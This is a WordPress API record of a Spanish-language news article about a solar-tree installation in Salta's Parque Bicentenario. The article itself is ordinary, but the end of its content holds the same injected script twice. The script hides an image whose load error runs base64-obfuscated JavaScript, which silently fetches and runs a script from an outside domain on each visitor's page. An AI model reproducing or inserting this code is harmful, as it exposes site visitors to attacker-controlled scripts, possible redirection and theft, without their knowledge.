{"id":1899,"date":"2022-12-06T11:02:44","date_gmt":"2022-12-06T14:02:44","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1899"},"modified":"2025-08-14T00:28:36","modified_gmt":"2025-08-14T03:28:36","slug":"el-parque-bicentenario-inauguro-su-bosque-solar-que-permite-reducir-el-consumo-energetico","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1899","title":{"rendered":"El Parque Bicentenario inaugur\u00f3 su bosque solar que permite reducir el consumo energ\u00e9tico"},"content":{"rendered":"\n<h3 class=\"has-vivid-green-cyan-background-color has-background wp-block-heading\"><em>Forma parte de una pol\u00edtica del Ministerio de Turismo y Deportes de generar en distintas escalas acciones sustentables.<\/em><\/h3>\n\n\n\n<p>El&nbsp;<strong>ministro de Turismo y Deportes Mario Pe\u00f1a<\/strong>&nbsp;encabez\u00f3 la inauguraci\u00f3n del Bosque de \u00e1rboles solares en el Parque del Bicentenario acompa\u00f1ado por autoridades del Poder Ejecutivo Provincial, de los Parques Urbanos y de Edesa que form\u00f3 parte junto al Ministerio de Ciencia, Tecnolog\u00eda e Innovaci\u00f3n Productiva de la Naci\u00f3n de este proyecto.<\/p>\n\n\n\n<p>El titular de la cartera Tur\u00edstica resalt\u00f3 el compromiso de todas las partes involucradas en la concreci\u00f3n del Bosque y expres\u00f3 \u201ctrabajamos e invertimos con visi\u00f3n de cuidar el medio ambiente, en el Parque del Bicentenario se generar\u00e1 un 7% de energ\u00eda limpia, el a\u00f1o que vienen avanzaremos\u201d y agreg\u00f3 las distintas acciones que en protecci\u00f3n ambiental se realizan entre las que se\u00f1al\u00f3 la nueva estaci\u00f3n del Tren a las Nubes en San Antonio de los Cobres y el plan de arbolado en el Centro de Convenciones, entre otros.&nbsp;<\/p>\n\n\n\n<p>Por \u00faltimo, Pe\u00f1a indic\u00f3 que se continuar\u00e1 trabajando para extender este modelo y \u201campliarlo a nuestros parques y poder llegar a los distintos rincones de la provincia, con una mirada a largo plazo para dejar a los que vienen\u201d.<\/p>\n\n\n\n<p>El Parque Bicentenario est\u00e1 comprometido con el ambiente y a trav\u00e9s del programa Eco Parque &#8211; ISO 14.001, contribuye a la generaci\u00f3n de energ\u00eda a trav\u00e9s de fuentes limpias (renovables); as\u00ed, se inici\u00f3 el trabajo con el Bosque solar que reduce el consumo de la red de media tensi\u00f3n en un 7 % aproximadamente. Este proyecto est\u00e1 enmarcado en el Plan Provincial de Energ\u00edas Renovables.\u00a0<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"1901\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/2041-el-parque-bicentenario-inauguro-su-bosque-solar-que-permite-reducir-el-consumo-energetico.jpg\" alt=\"\" class=\"wp-image-1901\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/2041-el-parque-bicentenario-inauguro-su-bosque-solar-que-permite-reducir-el-consumo-energetico.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/2041-el-parque-bicentenario-inauguro-su-bosque-solar-que-permite-reducir-el-consumo-energetico-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/2041-el-parque-bicentenario-inauguro-su-bosque-solar-que-permite-reducir-el-consumo-energetico-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/2041-el-parque-bicentenario-inauguro-su-bosque-solar-que-permite-reducir-el-consumo-energetico-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/2041-el-parque-bicentenario-inauguro-su-bosque-solar-que-permite-reducir-el-consumo-energetico-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"900\" height=\"600\" data-id=\"1900\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/2042-el-parque-bicentenario-inauguro-su-bosque-solar-que-permite-reducir-el-consumo-energetico.jpg\" alt=\"\" class=\"wp-image-1900\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/2042-el-parque-bicentenario-inauguro-su-bosque-solar-que-permite-reducir-el-consumo-energetico.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/2042-el-parque-bicentenario-inauguro-su-bosque-solar-que-permite-reducir-el-consumo-energetico-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/2042-el-parque-bicentenario-inauguro-su-bosque-solar-que-permite-reducir-el-consumo-energetico-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/2042-el-parque-bicentenario-inauguro-su-bosque-solar-que-permite-reducir-el-consumo-energetico-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/2042-el-parque-bicentenario-inauguro-su-bosque-solar-que-permite-reducir-el-consumo-energetico-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"899\" height=\"600\" data-id=\"1902\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/2043-el-parque-bicentenario-inauguro-su-bosque-solar-que-permite-reducir-el-consumo-energetico.jpg\" alt=\"\" class=\"wp-image-1902\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/2043-el-parque-bicentenario-inauguro-su-bosque-solar-que-permite-reducir-el-consumo-energetico.jpg 899w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/2043-el-parque-bicentenario-inauguro-su-bosque-solar-que-permite-reducir-el-consumo-energetico-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/2043-el-parque-bicentenario-inauguro-su-bosque-solar-que-permite-reducir-el-consumo-energetico-768x513.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/2043-el-parque-bicentenario-inauguro-su-bosque-solar-que-permite-reducir-el-consumo-energetico-696x465.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/12\/2043-el-parque-bicentenario-inauguro-su-bosque-solar-que-permite-reducir-el-consumo-energetico-629x420.jpg 629w\" sizes=\"(max-width: 899px) 100vw, 899px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Forma parte de una pol\u00edtica del Ministerio de Turismo y Deportes de generar en distintas escalas acciones sustentables. El&nbsp;ministro de Turismo y Deportes Mario Pe\u00f1a&nbsp;encabez\u00f3 la inauguraci\u00f3n del Bosque de \u00e1rboles solares en el Parque del Bicentenario acompa\u00f1ado por autoridades del Poder Ejecutivo Provincial, de los Parques Urbanos y de Edesa que form\u00f3 parte junto [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1901,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15,17],"tags":[],"class_list":{"0":"post-1899","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1899"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1899"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1899\/revisions"}],"predecessor-version":[{"id":7252,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1899\/revisions\/7252"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1901"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1899"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1899"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1899"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}